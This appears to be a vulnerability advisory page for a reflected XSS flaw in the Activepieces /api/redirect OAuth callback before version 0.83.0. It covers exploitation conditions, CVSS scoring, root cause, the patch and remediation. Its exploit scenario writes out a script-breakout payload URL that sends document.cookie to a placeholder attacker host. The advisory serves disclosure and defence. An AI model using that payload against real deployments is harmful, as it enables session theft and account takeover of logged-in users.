Exploitation Conditions

The victim must be logged into Activepieces in the same browser session when they open the crafted link - exploitation relies on the browser sending the victim's authenticated session context, and fails entirely against unauthenticated users. The attacker requires no credentials or prior access to the Activepieces instance; only the ability to deliver a URL to a logged-in user (e.g., via phishing email, chat message, or embedded link). The /api/redirect endpoint must be network-accessible to the victim's browser, which is the default and expected configuration for any Activepieces deployment using OAuth integrations with external services - no special or non-default configuration is required to be vulnerable. The sole limiting factor is UI:R: the victim must actively open the link; the attacker cannot trigger this server-side or autonomously scan for vulnerable sessions.

Impact

The CVSS 6.1 (Medium) vector AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N is well-calibrated: the attack is network-reachable, low complexity, and requires no attacker credentials, but is gated on a victim opening a crafted link (UI:R). The Changed scope (S:C) is significant - injected script executes in the Activepieces application origin, enabling same-origin access to session cookies, stored tokens, and authenticated API endpoints. No EPSS data was supplied, and the absence from CISA KEV indicates no confirmed active exploitation at time of analysis; however, the public patch commit precisely documents the vulnerable code path, meaning the technical effort to craft an exploit is minimal. Even a mid-sized municipal IT team in legnica running Activepieces for internal process automation should treat this as an urgent patch given that a single successful phishing attempt yields full account takeover. The CVSS impact metrics (C:L/I:L) conservatively score only direct effects; in practice, access to OAuth tokens stored within Activepieces could provide lateral movement into connected third-party services, amplifying the real-world impact beyond what the score conveys.

Exploit ScenarioDerived

An attacker identifies a publicly accessible Activepieces instance and crafts a URL such as /api/redirect?code=x%3C/script%3E%3Cscript%3Efetch('https://attacker.example/steal?c='+document.cookie)%3C/script%3E. The attacker delivers this URL to a logged-in Activepieces user via a phishing message; when the victim opens the link in their browser, the injected script executes in the Activepieces origin, silently exfiltrating the session token to the attacker's server. With the stolen session, the attacker can authenticate to Activepieces as the victim, access connected OAuth credentials, and manipulate or exfiltrate automation workflows.

AnalysisAIv1 – Aug 11, 2026

Reflected XSS in Activepieces' OAuth callback endpoint /api/redirect allows an unauthenticated attacker to steal session tokens or execute authenticated API calls on behalf of logged-in users. Versions prior to 0.83.0 embed the user-supplied code query parameter directly inside an inline <script> block, enabling script context breakout via closing tag injection - a flaw the public patch commit fully discloses, substantially lowering the barrier to exploit development. No public exploit code has been identified at time of analysis, and this CVE is not listed in CISA KEV.

RemediationAI

Upgrade to Activepieces version 0.83.0 or later, which fully resolves the injection by moving the OAuth code out of the script block into a DOM-read <meta> attribute and adding a Content-Security-Policy header. The release is available at https://github.com/activepieces/activepieces/releases/tag/0.83.0 and the specific patch is at https://github.com/activepieces/activepieces/commit/8be4c8d5e6a79ccbaa74815027432a3c8c311385. If an immediate upgrade is blocked, a compensating control is to restrict access to the /api/redirect endpoint at the reverse proxy or WAF layer - for example, allowing requests only from known OAuth provider redirect origins - but note this will break all OAuth-based integrations until the upgrade is applied. Do not treat blocking the endpoint as a permanent fix; it degrades product functionality and does not address the root cause.

Technical ContextAI · show details

Activepieces is a Fastify-based open-source AI workflow automation platform. The vulnerable component is the /api/redirect OAuth callback handler in packages/server/api/src/app/app.ts, which renders an HTML page that relays the OAuth authorization code to the parent window via postMessage. The original implementation interpolated the code query parameter directly into a JavaScript template literal inside an inline <script> block - even though JSON.stringify() was applied, this is insufficient in an HTML context because a payload containing </script> terminates the script element and begins arbitrary HTML injection. This is a textbook CWE-79 (Improper Neutralization of Input During Web Page Generation) failure: the output context (HTML-embedded script) was not accounted for in the encoding strategy. The fix at commit 8be4c8d5e6a79ccbaa74815027432a3c8c311385 decouples the code value from the script block entirely - storing it in a <meta> element's content attribute rendered via Mustache (providing HTML attribute encoding), then reading it via DOM in the script - and adds a Content-Security-Policy header. The CPE cpe:2.3:a:activepieces:activepieces:*:*:*:*:*:*:*:* covers all affected versions below 0.83.0.

DescriptionCVE.org

Activepieces is an open source AI workflow automation platform. Prior to 0.83.0, the /api/redirect OAuth callback endpoint embeds the user-supplied code query parameter directly into an inline script block without proper escaping. A crafted request to /api/redirect with a malicious code value can break out of the script context and execute arbitrary JavaScript in the Activepieces origin when a logged-in user opens it. An unauthenticated attacker can access the victim's session tokens or make authenticated API calls on the victim's behalf. This issue is fixed in version 0.83.0.
